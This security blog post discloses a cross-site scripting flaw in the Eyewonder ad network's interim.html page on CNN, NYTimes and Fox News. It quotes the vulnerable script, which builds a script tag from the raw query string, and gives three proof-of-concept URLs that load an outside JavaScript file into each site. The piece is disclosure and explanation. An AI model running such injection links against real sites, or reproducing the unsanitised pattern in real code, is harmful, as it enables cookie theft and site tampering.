According to security blogger David Lynch (http://http://davidlynch.org/), he has found a severe XSS vulnerability in Eyewonder Ad Network, including CNN, NY Times and Fox News involved in this vulnerability.

(Figure 1: CNN) 

 

 

(Figure 2: NYTimes) 

 

(Figure 3: Fox News)  

 

 

(Figure 4: Hi, Lionic!)  

Test links are as following:

http://edition.cnn.com/eyewonder/interim.html?src=http://davidlynch.org/projects/xss/eyewonder.js

http://www.nytimes.com/eyewonder/interim.html?src=http://davidlynch.org/projects/xss/eyewonder.js

http://www.foxnews.com/eyewonder/interim.html?src=http://davidlynch.org/projects/xss/eyewonder.js

 

All of these websites use Eyewonder Ad Network(http://www.eyewonder.com), the JS looks like this:

<script language="JavaScript">
    var query = window.location.search;
       var adUrl = query.substring(5, query.length);
       var clickthru;
       var failclickthru;
    document.write('<s'+'cript language="JavaScript" src="');
    document.write(adUrl+'"></s'+'cript>');

</script> 

Any severe attacks can make it by filling query string with malicious JS, like figure 4. injects "Hi, Lionic!" into CNN website.

Reference:

1. http://davidlynch.org/blog/2011/10/xss-is-fun/

  

By AegisLab